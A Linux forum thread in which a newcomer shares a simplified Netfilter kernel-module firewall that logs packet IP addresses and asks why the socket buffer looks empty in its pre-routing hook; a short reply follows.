On Sun, Apr 27, 2008 at 05:44:46PM +0700, Vladimir Voroshilov wrote: > On Sun, Apr 27, 2008 at 4:56 PM, Diego Biurrun <diego at biurrun.de> wrote: > > On Sun, Apr 27, 2008 at 01:05:07AM +0700, Vladimir Voroshilov wrote: > [...] > > > > + if(pitch_delay_frac < 0) > > > + { > > > > I think Michael prefers braces on the same line. > > All issues except this are fixed. Ummm, no :) > --- /dev/null > +++ b/libavcodec/acelp_filters.c > @@ -0,0 +1,261 @@ > + > + /* The lookup table contain values corresponding containS > + The filtering process uses a negative pitch lag offset, but > + a negative offset should not be used in then table. To avoid > + a negative offset in the table dimension corresponding to > + fractional delay the following conversion applies: delay, > + // Clippin is required to pass G.729 OVERFLOW test ClippinG > --- /dev/null > +++ b/libavcodec/acelp_filters.h > @@ -0,0 +1,125 @@ > + > + * The routine assumes the following order of fractions (X - integer delay): fraction order > + * The routine can be used for 1/3 precision too, by > + * passing 2*pitch_delay_frac as third parameter The routine can be used for 1/3 precision by passing 2*pitch_delay_frac as third parameter. > +/** > + * \brief Calculates coefficients of weighted A(z/weight) filter > + * \param out [out] resulted weighted A(z/weight) > + * filter (-0x8000 <= (3.12) < 0x8000) resulting > + * \remark It is safe to pass the same array in in and out parameters Add a period, could be done in other places as well. > +#endif // FFMPEG_ACELP_FILTERS_H I don't like C++ comments :) Diego | http://ffmpeg.org/pipermail/ffmpeg-devel/2008-April/041178.html | CC-MAIN-2018-05 | refinedweb | 240 | 62.17 |
Expose Your Rails CRUD to the Browser with DataboundBy Devdatta Kane
As we go on building more and more JavaScript applications, the need for APIs will go on increasing. Writing a full-fledged API requires quite an amount of planning and time. But sometimes, all we require in an API are just common CRUD actions. Writing CRUD APIs for each and every resource can be quite a tedious and repetitive task. The Ruby community being what it is, some enterprising developers have taken a shot at solving the tedium. Today we will try a gem that will simplify creating these CRUD-based APIs within a Rails application. Let’s get started.
Creating a Rails application
We will create a basic Rails application with a Contact model. The application will use MRI Ruby, Rails 4.2, and SQLite to keep things simple. First of all, install MRI Ruby with RVM or rbenv.
Switch to Ruby and
gem install rails to get the latest Rails gem. Now create a new Rails application, like so:
rails new databound_rails -T
After the application is generated, create a Contact model:
cd databound_rails rails g model Contact name:string address:string city:string phone:string
Migrate the database:
rake db:migrate
Now we have Contact model in place. We will create the CRUD interface later.
Installing Databound
Now we will integrate Databound gem in our Rails application. We will also add ‘lodash-rails’ gem since Databound depends on it. Like so:
gem 'databound', '3.1.3' gem 'lodash-rails', '3.10.1'
We are using ‘3.x’ version of ‘lodash’ for compatibility reasons.
Install both gems:
bundle install
Databound comes with a generator to add the required files into our application, so run it:
rails g databound:install
This adds databound.js to our asset pipeline. You’ll need to manually add ‘lodash’ in app/assets/javascripts/application.js, so that it’s picked up by the asset pipeline:
//= require lodash //= require databound
Databound will already we added in application.js, but you need to remember to require ‘lodash’ before Databound.
Configuring Databound
Let’s use Databound with our Contact model. First, modify config/routes.rb to add Databound routes for Contact model:
Rails.application.routes.draw do databound :contacts end
As you can see, we have added a Databound route for Contact model.
Databound will generate a controller named
ContactsController automatically at runtime if it is not found. For simple models, this feature can save the time of writing controllers for each model. We can also specify API accessible columns here, like so:
databound :contacts, columns: [:name, :address, :city, :phone]
But we will create a
ContactsController since we will explore more advanced options provided by Databound and hence will configure the columns in the controller itself.
Let’s
ContactsController with following code:
class ContactsController < ApplicationController databound do model :contact columns :name, :address, :city, :phone end end
Here we have defined the
model as
:contact, along with the
columns that are accessible from the API here instead of doing so in routes.rb. Now when we invoke the API, only these specified columns can be accessed or modified.
Building the Frontend
We have our backend ready. Let’s create a simple jQuery-powered frontend for testing the API. First, add an action to our
ContactsController for showing the Contacts page.
In app/controllers/contacts_controller.rb, add the following:
def index end
You’ll need add a route for that action in config/routes.rb:
get 'contacts' => 'contacts#index'
Create the view for the action in app/views/contacts/index.html.erb with the following code:
<h1>Contacts</h1> <table border="0"> <tr> <td colspan="2"><h3>Create Contact</h3></td> </tr> <tr> <td><strong>Name:</strong></td> <td><input name="txtName" id="txtName" /></td> </tr> <tr> <td><strong>Address:</strong></td> <td><input name="txtAddress" id="txtAddress" /></td> </tr> <tr> <td><strong>City:</strong></td> <td><input name="txtCity" id="txtCity" /></td> </tr> <tr> <td><strong>Phone:</strong></td> <td><input name="txtPhone" id="txtPhone" /></td> </tr> <tr> <td colspan="2" align="center"><button name="createContact" id="createContact">Create Contact</button></td> </tr> </table> <table border="0" id="tblContacts"> <thead> <th>Name</th> <th>Address</th> <th>City</th> <th>Phone</th> </thead> <tbody> </tbody> </table>
Here we have created a simple interface to create a new Contact and show it in a table below. Now we will create contacts.js in app/assets/javascripts to bring the view to life:
var Contact = new Databound('/contacts'); $(document).ready(function(){ $('#createContact').on('click', function() { Contact.create({ name: $('#txtName').val(), address: $('#txtAddress').val(), city: $('#txtCity').val(), phone: $('#txtPhone').val() }).then(function(new_contact) { var table = $('#tblContacts tbody'); var row = "<tr>"; row += "<td>" + new_contact.name + "</td>"; row += "<td>" + new_contact.address + "</td>"; row += "<td>" + new_contact.city + "</td>"; row += "<td>" + new_contact.phone + "</td>"; row += "</tr>"; $(table).append(row); }); }); });
We have defined the
Contact Javascript object which we will be using for invoking CRUD actions on Contact model:
var Contact = new Databound('/contacts');
Next, there’s a simple event handler for the
createContact button to call
Contact.create, passing along the data from the Name, Address, City and Phone fields. Finally, append the created record to the table.
Let’s test if this works. Fire up the Rails server:
rails s
Hit and create a few records. Records should be created and be visible in the table.
We have now successfully integrated Databound into our API. Let’s explore the other functions provided by Databound.
Searching API
Databound provides three client-side APIs for searching records. Let’s see them one by one.
where API
Contact.where({ name: 'Devdatta' }).then(function(contacts) { alert('Contacts named Devdatta'); });
Here we are invoking the
where API to search for contacts that have
name field matching with ‘Devdatta’. The matching records are returned in
contacts object.
find API
Contact.find(1).then(function(contact) { alert('Contact ID 1: ' + contact.name); });
Here we can find a specific contact with its primary key using the
find API. We have passed the primary key as ‘1’ and received the relevant record in
contact object.
findBy API
Contact.findBy({ name: 'Devdatta' }).then(function(contact) { alert('Contact named Devdatta from ' + contact.city); });
findBy API is similar to
where but you can specify only one field to search with. Here we are searching with
name field matching with ‘Devdatta’. Matching record is returned in
contact object.
We can also specify the default scope for searching as well using the
extra_where_scopes while initializing the API. Like so –
var Contact = new Databound('/contacts', { city: 'Pune' }, { extra_where_scopes: [{ city: 'Mumbai' }] } );
Update & Delete API
Databound also provides
update and
destroy APIs to edit and delete records, respectively
Update API
Contact.update({ id: 1, name: 'John' }).then(function(contact) { alert("My name has changed. I'm " + contact.name); });
Using Databound’s
update API we can update the record’s fields as specified. Only accessible columns’ data will be updated as specified in the controller. Once updated, the contact object is returned with updated data.
Delete API
Contact.destroy(1).then(function(status) { if (status.success) alert('Contact deleted'); });
Records are deleted using the
destroy API which accepts the primary key of the record as argument and returns the status as true or false.
Permit actions
Databound also allows specifying which actions are permitted based on certain conditions that can be invoked using API. For example:
permit(:update, :destroy) do |params, record| record.user_id == current_user.id end
(Since we have not setup any authentication mechanism in our sample, this won’t work directly in our application)
More from this author
Wrapping Up
Today we got a short introduction to Databound and how to use it in a Rails application. Many Rubyists may not like the way Databound works, since it binds your frontend code to the database rather tightly. However, there are sometimes cases where simplicity of solution wins over architectural purity. Databound merits a hard look is those kinds of scenarios. It is useful for fast prototyping of APIs and for small applications as well.
Hope you liked the tutorial. | https://www.sitepoint.com/expose-your-crud-to-the-browser-with-databound/?utm_source=sitepoint&utm_medium=relatedsidebar&utm_term=ruby | CC-MAIN-2017-22 | refinedweb | 1,341 | 58.79 |
cout not printing anything?wait I understood now.. I wrote the wrong sign. lol, thanks
cout not printing anything?no, I doubt it's the problem, since if I write something in the console I can see it which means it ...
cout not printing anything?[code]#include <iostream>
using namespace std;
int main () {
for (int x=1;x>9;x++) {
...
For loop reads second parameter as first along with first parameter...Thanks!
For loop reads second parameter as first along with first parameter...So I did a test code for changing colors and stuff, and it compiles right, but I'm having a problem,...
This user does not accept Private Messages | http://www.cplusplus.com/user/cplusplus123/ | CC-MAIN-2015-35 | refinedweb | 111 | 79.26 |
this list, but am looking for a replacement for SquirrelMail,
and IlohaMail looks quite nice. I also like its basic idea behind it.
I'm currently testing it on my webserver, and started with the latest
CVS from SourceForge, also because I'm interested in the GPG feature.
The GPG configuration part said, it would be a complete GPG management
thing with key chain management etc. But when I access that page in my
settings, it first wants to create a new key. I cannot import my current
key at the beginning. So I had it create a key, but half a minute later
(it's a fast machine), it printed some garbage (not a lot, only 3 lines)
in that frame and that's it. Another access to that page and I could
import new public keys. Obviously my generated key wasn't there. Is this
a known thing or so?
Also, when composing new messages, I can select one (out of none, for
now) keys to encrypt to. But what about signing my own e-mail? Is that
done automatically? I mean that would be fine, but there's no indication
about it.
Importing a public key also doesn't work. It prints (in black, as the
garbage above) "Write:", then the normal input form with my public key
in it again. The drop-down list is still empty. 'gpg --list-keys' as
that web user shows an empty list.
Ah, I forgot: PHP 5.1.3/FastCGI with APC enabled. Using file storage for
IlohaMail, that's easier for now. MySQL 4.0 and 5.0 are available. I
could switch down to PHP 4.4/FastCGI or PHP 4.4/CGI for this directory
if required, but am trying to avoid that.
I'll continue testing and see how it runs in a more realistic
environment. But does anybody know right now if it can use PGP/MIME or
will it add those ugly ---BEGIN PGP...--- lines everywhere?
So far, IlohaMail looks good and works really fast. It's a little sad
that development looks ceased for a year now, apart from some
discussions on this list (I quickly browsed the archives). Should I like
it even more, use it in my productive environment and find some time to
look into the source, I probably want to help a little in coding stuff
so that it gets further a little. :)
Regards,
--
Yves Goergen "LonelyPixel" <nospam.list@...> – My web laboratory.
I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details | https://sourceforge.net/p/ilohamail/mailman/message/2528211/ | CC-MAIN-2017-17 | refinedweb | 456 | 76.62 |
"The only hurdle I see really is that I'm not sure if the Arduinos Wire library will work with it."Do you (or anybody else) know if there is another library I could use instead?
//Use Wire Library to do I2C communication #include <Wire.h>
/***** Function to write commands and data to I2C bus ***************************/uint8_t I2C_write(uint8_t command, uint8_t data){ Wire.beginTransmission(AS1130ADDRESS); Wire.write(command); Wire.write(data); int ack = Wire.endTransmission(); #ifdef DEBUG if (ack != 0) { Serial.print("Error: "); Serial.print(ack); Serial.print("\r\n"); } #endif return ack;}
/***** Start-up sequence as per datasheet - see Page 13 ******************************/// (1) define ram configuration - see table 20 page 25// (2) Fill the On/Off Frames with our data// (3) Set-up Blink & PWM sets// (4) Set-up Dot Correction (if required)// (5) Define Control Registers - see table 13 page 20 // (6) Define Current Source (0 to 30mA) - see table 19 page 24// (7) Define Display Options// (8) Start Display (Picture or Movie) Movie takes precedence over Picture
And if I use four AS1130 to build a 11x48 Matrix, how do I have to connect the Sync Pins?1. I'll do it like in the datasheet, on p.32 Figure 27., that there is only one Sync-Pin configured as Sync_Out and the other three AS1130 are Sync_In and then the Sync_Out is connected to the three Sync_In? But that means that the clock speed will decrease?!Therefore I have a 2. solution: To configure every Sync Pin of the four devices as Sync_Out that each of them works (with their own oscillator) independent from the others ?
In the Datasheet is written: "After a first write of data to the frames, the configuration is locked in the AS1130 config register and can be changed only after a reset of the device. A change of the RAM configuration requires to re-write the frame datasets."
thanks
I asked you some questions in my last post hexadec
So of what was funkyguy4000 talking there?
But would the circuit also work if I use four Sync_In Pins and let them work with their own oscillator that they are independant of the other devices clock?
I'm really sorry Hexadec
@funkyguy4000 :Of what were you talking there about that library?
Please enter a valid email to subscribe
We need to confirm your email address.
To complete the subscription, please click the link in the
Thank you for subscribing!
Arduino
via Egeo 16
Torino, 10131
Italy | http://forum.arduino.cc/index.php?topic=122138.msg953663 | CC-MAIN-2015-22 | refinedweb | 412 | 69.92 |
This is the fourth in a short series of articles that add Ajax functionality to a Java EE web application developed in the NetBeans IDE.
As discussed in the previous article in this series, the JavaServer Faces technology included in the Java EE platform enables you to create your own custom components, which you can then reuse in different applications. The approach in the previous article required the custom component and its resources to be bundled and distributed with the web application.
This article describes a phase listener approach to building the custom component. In this approach, the component's resources are packaged with the component in a
.jar file that is bundled with the web application. The resources are served through a phase listener on the server. To distinguish this approach from the previous one in the example project, it is called CompB.
As in the previous custom component approach, the CompB custom component generates the JavaScript code needed to handle Ajax interactions with the server. Again, you use the same Java Servlet that was used in the do-it-yourself method.
The client component's resources, such as the JavaScript file and CSS, are accessed through the phase listener. The phase listener approach takes advantage of more of the power of JavaServer Faces technology than did the component approach described in the previous article in this series.
The phase listener can delegate responsibility to a managed bean's method or use a legacy servlet. In this example, you use the legacy servlet. Using the legacy servlet has two major advantages:
The disadvantage of using a legacy servlet is that it does not take advantage of the inherently more capable and robust managed bean approach. For information on how to use a managed bean for server-side processing, see the discussion in Using PhaseListener Approach for Java Server Faces Technology with AJAX and Accessing Resources From JavaServer Faces Custom Components
The CompB (phase listener) approach can be appropriate in the following cases:
The CompB approach also has its shortcomings, namely:
.jarfiles that are registered in all the
faces-config.xmlfiles bundled with your application are fired sequentially, with no guarantee to the order.
Figure 1 shows how resources for the component are accessed from the web container. The cycle begins when the user navigates to the book catalog page.
The steps in Figure 1 are as follows:
CompB.jararchive.
CompB.jararchive, and returns them to the phase listener.
Figure 2 shows how data for a specific pop-up balloon is obtained through the Ajax request.
onmouseoverevent handler.
onmouseoverevent handler calls the
bpui.compB.showPopup()function in the
compB.jsfile. This function sends a request to the
PopupServletthrough the
XMLHttpRequestobject.
PopupServletreceives the request and, using the existing
BookDBAobject, obtains the book title detail data and formats a response to the request.
PopupServletthen returns an XML response that holds the book detail.
ajaxReturnFunction()is called when the response is returned from the
PopupS second implementation of a JavaServer Faces component, you create a component with resources accessed by a servlet. When creating your custom component, you edit the tag library definition file
ui.tld, the JavaServer Faces configuration file
faces-config.xml, the tag handler
CompBTag.java, and the renderer
CompBRenderer.java. You also create a phase listener,
CompBPhaseListener.java. The phase listener is the major difference between the CompA and CompB approaches.
The component CompB has been precompiled into a
.jar file in the project. In the Project window, you can find the file located in the project's bookstore2 > Web Pages > WEB-INF > lib folder. As you examine the source files for CompB, you will open the read-only files in this
.jar file.
The source files used to build
CompB.jar can be seen in the Files window, under the bookstore2 > compB node. The
readme.html file in the
compB folder describes how to compile the source files. In the procedures in this article, you do not edit the source files. Use the files to experiment and as the basis of your own JavaServer Faces components. ComponentB.jsp file already present in the project.
bookcatalog.jspfile.
bookcatalog_compB.jspfile, right-click, and choose Copy from the contextual menu.
booksnode, right-click, and choose Paste from the contextual menu. A copy of the
bookcatalog_compB.jspfile appears in the list.
bookcatalog_comp it is very similar to the version used for Creating an Ajax-Enabled Application, a Component Approach.
The changes in the file appear on lines 33–37, where the
bpui:compB component is identified, along with the servlet that responds to the component's Ajax call:
The
onmouseover and
onmouseout event handlers (lines 78–79) also have changed to reference the CompB versions of the
showPopup() and
hidePopup() functions.
In other ways, the
bookcatalog.jsp page is the same as the CompA version.
Now, examine your project's tag library descriptor (
.tld) file. In the CompB approach, the
ui.tld file is contained in the
CompB.jar file. Open the file in the NetBeans Editor:
ui.tldfile to open it as a read-only file in the NetBeans Editor.
In the
ui.tld file, you see that tags for
CompB lie between lines 13 and 67. The
id,
url,
style, and
styleClass attributes declared in the file are used the same way as the same attributes declared in the
ui.tld file for CompA. One obvious difference is the definition of the
<name> tag (line 15):
The name is used with the taglib namespace prefix
bpui in the
bookcatalog.jsp file.
In the CompB approach, you must put the component's resources in a location that the phase listener can find. When you place the
CompB.jar file in the project's Libraries folder, it is deployed to the
.war file's
WEB-INF/lib directory. This directory is automatically searched by the phase listener when it looks for package resources. This feature enables others to easily use the components you create.
The phase listener itself is registered by means of the
faces-config.xml file.
To view the
faces-config.xml file:
faces-config.xmlto open the file in the NetBeans Editor.
In the
faces-config.xml file, consider lines 12–30, which configure the CompB component.
Lines 15–22 register the name and location of the renderer for the component.
Lines 26–28 register the name and location of the phase listener for the component. The phase listener handles all of the component's requests for resources and methods.
In summary, the file registers the renderer
CompBRenderer and the lifecycle component
CompBPhaseListener. You now examine the major difference between the CompA and CompB approaches: the phase listener.
The JavaServer Faces framework invokes the phase listener every time a request passes through the FacesServlet. The sole responsibility of the phase listener in your project is to serve the resources needed by the component.
The
.java source files have been included in the
compB.jar file. Such inclusion is not typical, but in discussing this example it is convenient to have the source files close to their corresponding classes.
To view
CompBPhaseListener.java:
CompBPhaseListener.javafile to open it in the NetBeans Editor.
Note the
afterPhase() method, beginning on line 55. This method is called by the JavaServer Faces framework at each phase of the lifecycle that is returned by the
getPhaseId() method. In this example, the
afterPhase() method is called during the
PhaseId.RESTORE_VIEW lifecycle phase. In the event that the phase listener is called for on all phases, then the
getPhaseId() method returns
PhaseId.ANY_PHASE, and
afterPhase() is called after every request through the FacesServlet.
In line 60, the
afterPhase() method obtains the application key:
The value of
APP_KEY is set to
/jsf-example/ in line 45. The characters
jsf-example are part of the URL resource path set in
CompBRenderer. This value sets the path to the resources for the component and limits the requests for which the phase listener operates, thus reducing possible side effects to other requests being made through the FacesServlet.
For example, when the
afterPhase() method is passed an event, it notes that the value of
APP_KEY for the event is
/jsf-example/. The method then extracts the root ID (
rootId) of the event. The root ID is the actual URL of the resource that is located in the
compB.jar, as constructed by the renderer
CompBRenderer.
In
CompBPhaseListener.java, the URL for the JavaScript resource that is constructed in the
afterPhase() method in line 65 is:
In the project build, the URL resolves to:
The
if-else statements in lines 64–73 of the
afterPhase() method guarantee that JavaScript, CSS, and image content types are handled properly and can be found by resource consumers. These lines test to see that the application key exists and that the resource URL is one of the types declared in lines 40–44. If the suffix is recognized as a resource,
afterPhase() constructs a relative URL for the resource and passes it to the
handleResourceRequest() method.
The
handleResourceRequest() method (lines 100–127) is straightforward. Line 103 finds the fully qualified URL given the relative URL for the resource:
The
getResource() method allows the servlet container to make a resource available to servlets from any source. Resources can be located on a local or remote file system, in a database, or in a
.war file. For example, the relative URL of the CompB component's JavaScript file is
/jsf-example/compB/compB.js. The
getResource() method finds the resource in a local class path in the project's
.war file, in the path
web/WEB-INF/lib/compB.jar/META-INF/jsf-example/compB/compB.js.
If the resource cannot be found, the
getResource() method returns null, and the
try-catch block in lines 110–119 prints an error message when the
readWriteBinaryUtil() method throws an exception. That method simply reads in the resources.
Note that you, as the component developer, are responsible for creating resources and placing them in the proper locations. After the component has been successfully packaged, it can be used without regard to such details.
So, the
handleResoureRequest() method looks up the resource, composes its full URL, and returns the URL along with the resource content type. Line 112 sets the response status to 200, which indicates that the resource was found successfully. It then opens a stream and puts back a binary stream.
The method that reads and writes the binary stream is
readWriteBinaryUtil(), shown in lines 142–169. The reason to use a stream is because not all resources are character data. The binary stream allows image resource data to be transferred.
As an aside, note that the
images folder that holds the pop-up balloon's corner images are located in the same directory in your project as the
compB.css style sheet. The style sheet finds the images with a relative path name, not a fully qualified one. Thus you will see references to the images in
compB.css like the following (taken from line 3 of the style sheet):
You now examine the way actions are mapped in the phase listener.
JavaServer Faces 1.2 introduced a unified expression language. In line 82, the
afterPhase() method calls the expression factory:
This line creates an expression out of the method for use with a managed bean. In your project you use a legacy servlet rather than a managed bean. For information on how to use a managed bean for server-side processing, see the discussion in Using PhaseListener Approach for Java Server Faces Technology with Ajax.
CompBTagTag Class
You now examine the CompBTag class referenced by the
ui.tld file to see how the pop-up component's tag data is used.
To view
CompBTag.java:
CompBTag.javafile to open it in the NetBeans Editor.
The
CompBTag class extracts attribute values from the tag, populates the component, and maps to a renderer type that is registered in
faces-config.xml. Its function is identical to the
CompATag class in the CompA approach.
getRendererType() method maps the
CompB tag to a renderer type. That renderer type is determined by the
CompBRenderer class.
CompBRendererClass
To see how the
CompBRenderer class executes the rendering, you now examine the
CompBRenderer.java file.
CompBRenderer.javafile to open it in the NetBeans Editor.
In the
CompBRenderer.java file, scroll to lines 45–47 of the
CompBRenderer class definition:
Lines 45–46 show that the class uses the script resources of the
compB.js and
compB.css files. These resources display the HTML markup for the pop-up balloon and provide the information that the balloon displays.
Line 47 shows that the class uses a resource template. Much of the code that was in the
CompARenderer.java file in the previous article is drawn from a template in this example. A resource template is the preferred approach because the component does not need to be recompiled whenever you change the template HTML code. To view the template contents:
compB_template.txt.
Note that the CompA approach could also have made use of a resource template.
Other than renaming instances of CompA to CompB (for example, changing the namespace from
bpui.compA to
bpui.compB), not much is different between the CompA and CompB versions of the renderer.
compB.cssStyle Sheet
The CSS file for the CompB implementation differs only slightly from CompA approach. To view the style sheet contents in the NetBeans Editor:
compB.cssfile.
In the file, note that the class selector namespace has changed to
.bpui_compB. The namespace ensures a unique name for the styles, eliminating the possibility of inadvertent duplication. The name changes are the only difference between the CompB and CompA versions of the style sheet.
Note also that the image file names under the bookstore2 > Web Pages > WEB-INF > lib > compB.jar > META-INF > jsf-example > compB > images node have been changed to begin with
compB_ in order to make them unique.
compB.jsFile
The
compB.js file is almost the same as the
compA.js file. Again, the namespace has changed from
bpui.compA to
bpui.compB. Functionally, the script does exactly the same thing as its CompA counterpart.
Note that, because of the separate namespaces, it would be possible to use both components (CompA and CompB) in the same page.
To view the
compB.js file in the NetBeans Editor:
compB.jsfile.
DispatcherClass
The
Dispatcher class finds known URL patterns, alters them if necessary, and forwards them for further processing. The dispatchers for the CompA and CompB approaches are identical. See the discussion in the previous article for details.
Now, examine the generated HTML markup for the project by building and deploying it.
The HTML code for the deployed page is very similar to that produced in the CompA approach. The only significant differences are the CompB naming conventions and the new URLs of the component resources. For example, in CompB, the JavaScript resource file is:
Whereas, in the CompA version it is:
This series of four articles shows a progression for implementing Ajax functionality in a legacy application:
You can build and deploy the project in the NetBeans IDE using any of these approaches by using the appropriate
bookcatalog.jsp file during the build.
The CompB approach, using a JavaServer Faces phase listener, takes greater advantage of the JavaServer Faces framework than did the CompA approach discussed in the previous article. In the CompB approach, the JavaServer Faces component is compiled into a
.jar file that is placed in the application's
Web Pages/WEB-INF/lib project directory. The component sends Ajax requests to the server and handles the replies. The component can be reused by placing it in the
WEB-INF/lib directory of other projects.
On the server side, Ajax calls are handled by the phase listener, which serves resources for the component. To fulfill the Ajax request on the server side, the phase listener requests data from the legacy servlet that was used with the original application. When building an application from scratch, you would more likely use a managed bean instead of a servlet.
In some circumstances, the use of a JavaServer Faces component with a phase listener degrades performance because the phase listener is called on every request through the FacesServlet. In the example that has been the subject of these articles, the performance penalty is minimal because Ajax requests occur infrequently.
Other advantages of the CompB approach are the same as those of CompA, namely:
bookcatalog.jspfile and return to your original application, affecting only one page.
Check the Hands-On Java EE page for a follow-on article that describes state management with JavaServer Faces technology. Managing application state exploits the full capabilities of JavaServer Faces technology. | http://www.oracle.com/technetwork/articles/javaee/compb-141697.html | CC-MAIN-2015-22 | refinedweb | 2,785 | 57.27 |
Dean Nelson <dcn@sgi.com> writes:>> Christoph is correct in that XPC has a single thread that exists throughout> its lifetime, another set of threads that exist for the time that active> contact with other XPCs running on other SGI system partitions exists, and> finally there is a pool of threads that exist on an as needed basis once> a channel connection has been established between two partitions.>> In principle I approve of the kthread API and its use as opposed to what> XPC currently does (calls kernel_thread(), daemonize(), wait_for_completion(),> and complete()). So Christoph's patch that changes the single long-lived> thread to use kthread_stop() and kthread_should_stop() is appreciated.>> But the fact that another thread, started at the xpc_init() time, that does> discovery of other SGI system partitions wasn't converted points out a> weekness in either my thinking or the kthread API. This discovery thread> does its job and then exits. Should XPC be rmmod'd while the discovery> thread is still running we would need to do a kthread_stop() against it. > But kthread_stop() isn't set up to deal with a task that has already exited.> And if what once was the task structure of this exited task has been> reallocated to another new task, we'd end up stopping it should it be> operating under the kthread API, or possibly waiting a very long time> for it to exit if it is not.Patches are currently under development to allow kthreads to exitbefore kthread_stop is called. The big thing is that once we allowkernel threads that exited by themselves to be reaped by kthread_stopwe have some significant work to do.> I'm also a little uneasy that kthread_stop() has an "only one thread can> stop another thread at a time" design. It's a potential bottleneck on> very large systems where threads are blocked and unable to respond to a> kthread_should_stop() for some period of time.There are already patches out there to fix this issue.> XPC is in need of threads that can block indefinitely, which is why XPC> is in the business of maintaining a pool of threads. Currently there is> no such capability (that I know of) that is provided by linux. Workqueues> can't block indefinitely.I'm not certain I understand this requirement. Do you mean block indefinitelyunless requested to stop?> And for performance reasons these threads need to be able to be created> quickly. These threads are involved in delivering messages to XPC's users> (like XPNET) and we had latency issues that led us to use kernel_thread()> directly instead of the kthread API. Additionally, XPC may need to have> hundreds of these threads active at any given time.Ugh. Can you tell me a little more about the latency issues?Is having a non-halting kthread_create enough to fix this?So you don't have to context switch several times to get thethread running?Or do you need more severe latency reductions?The more severe fix would require some significant changes to copy_processand every architecture would need to be touched to fix up copy_thread.It is possible, it is a lot of work, and the reward is far from obvious.> I think it would be great if the kthread API (or underlying implementation)> could be changed to handle these issues. I'd love for XPC to not have to> maintain this sort of thing itself.Currently daemonize is a serious maintenance problem.Using daemonize and kernel_thread to create kernel threads is a blockerin implementing the pid namespace because of their use of pid_t.So I am motivated to get this fixed.Eric-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at | https://lkml.org/lkml/2007/4/27/394 | CC-MAIN-2015-35 | refinedweb | 631 | 62.58 |
Python regexes - findall, search, and match
This guide will cover the basics of how to use three common regex functions in Python - findall, search, and match. These three are similar, but they each have different a different purpose. This guide will not cover how to compose a regular expression so it assumes you are already somewhat familiar.
re.match
The match function is used for finding matches at the beginning of a string only.
import re re.match(r'hello', 'hello world') # <_sre.SRE_Match at 0x1070055e0>
But keep in mind this only looks for matches at the beginning of the string.
re.match(r'world', 'hello world') # None
Even if you're dealing with a multiline string and include a "^" to try to search at the beginning and use the re.MULTILINE flag, it will still only search the beginning of the string.
re.match(r'^hello', 'good morning\nhello world\nhello mom', re.MULTILINE) # None
A great use case for re.match is testing a single pattern like a phone number or zip code. It's a good way to tell if your test string matches a desired pattern. This is a quick example of testing to make sure a string matches a desired phone number format.
if re.match(r'(\d{3})-(\d{3})-(\d{4})', '925-783-3005'): print "phone number is good"
If the string matches, a match object will be returned; otherwise it will return None.
You can read more about Python match objects if necessary.
re.search
This function is very much like match except it looks throughout the entire string and returns the first match. Taking our example from above:
import re re.search(r'world', 'hello world')
<_sre.SRE_Match at 0x1070055e0>
When using match this would return None, but using search we get our match object. This function is especially useful for determining if a pattern exists in a string. For instance, you might want to see if a line contains the word sandwich.
Or maybe you want to take a block of text and find out if any of the lines begin with a number:Or maybe you want to take a block of text and find out if any of the lines begin with a number:
line = "I love to each sandwiches for lunch." if re.search(r'sandwich', line): # <_sre.SRE_Match at 0x1070055e0> print "Found a sandwich"
text = """ 1. ricochet robots 2. settlers of catan 3. acquire """ match = re.search(r'\d+.', text, re.MULTILINE) match.group()
'1.'
Again, this is very valuable for searching through an entire block of text to look for a match. If you're looking to find multiple occurrences of a pattern in a string, you should look at step 3 - findall.
re.findall
Findall does what you would expect - it finds all occurrences of a pattern in a string. This is different from the previous two functions in that it doesn't return a match object. It simply returns a list of matches. Using our board game example from above:
text = """ 1. ricochet robots 2. settlers of catan 3. acquire """ re.findall(r'\d+.', text, re.MULTILINE)
['1.', '2.', '3.']
As you can see, this returns a list of matches. If you don't use parentheses to capture any groups or if you only capture one group, the result will be a list of strings. If you capture more than one group, the result will be a list of tuples.
text = """ 1. ricochet robots 2. settlers of catan 3. acquire """ re.findall(r'^(\d+).(.*)$', text, re.MULTILINE)
[('1', ' ricochet robots'), ('2', ' settlers of catan'), ('3', ' acquire')]
In this case we're capturing the number and the name of the game in two different groups. | https://howchoo.com/g/zdvmogrlngz/python-regexes-findall-search-and-match | CC-MAIN-2019-39 | refinedweb | 621 | 74.69 |
We are about to switch to a new forum software. Until then we have removed the registration on this forum.
Hi!
I'm using arduino and a PIR sensor to detect motion. Sending 'A' when HIGH and 'B' when LOW through the serial port.
In processing I have a working sketch that will display an image when 'A' is being sent through. clears it and shows the background when 'B'. I want to take this a step further and have it display a random image from an array. I've been trying to plug and play with Shiffman's examples but no luck. Anyone have any tips??
this is the code that's working for me without random function. Sorry if it is sloppy.
import processing.serial.*; PImage bg; Serial myPort; // The serial port: boolean drawImage; int count; PImage photo; void setup() { size(385,351); bg = loadImage("yes.jpg"); // List all the available serial ports: println(Serial.list()); // Open the port you are using at the rate you want: myPort = new Serial(this, Serial.list()[8], 9600); drawImage = false; int count = 0; photo = loadImage("no1.jpg"); } void draw() { background(bg); while (myPort.available () > 0) { char inByte = myPort.readChar(); if (inByte == 'A') { drawImage = true; if (inByte == 'B') drawImage = false; } } if (drawImage) { count+=1; fill(0); image(photo, 0, 0); } if (drawImage && count > 120) { drawImage = false; count = 0; } }
Answers
You could do the follwing.
hope that you understand it, and it's what you want
Thomas | https://forum.processing.org/two/discussion/4085/how-to-display-random-image-from-serial-port-signal | CC-MAIN-2020-45 | refinedweb | 244 | 68.16 |
Results 1 to 2 of 2
- Join Date
- Mar 2009
- 2
[SOLVED] empty socket buffer(??) while using Netfilter.
I am new to Netfilter and kernel programming in linux. I tried to implement a simple firewall using Netfilter after reading online tutorials on this. For some reason, I am getting an empty socket buffer( I think) when the hook function is called. I tried googling for solutions but no luck. I am pasting a simplified version of my firewall code. As a test bed, I used a simple client-server socket program. To check if the problem was in the test bed, I disabled the testbed, inserted the firewall module and verified the socket buffer for regular internet traffic (browser .) but no luk on this.
Is my implementation wrong?I cant seem to figure out why on earth the buffer will be empty.
Am i missing out something really obvious?
Digging a lil deeper into packet traversal, i surmised that it is the NIC's job to create and populate sk_buff which is passed to kernel through netif_rx().
I am running my code on ubuntu 8.10. So taking a really far fetched( and almost certainly wrong) guess, could it have something to do with ubuntu's driver for broadcom cards?
My sincere apoplogies if I posted in the wrong forum. This is my first post.
/// Simplified firewall code.
#ifndef __FW_C
#define __FW_C
// includes
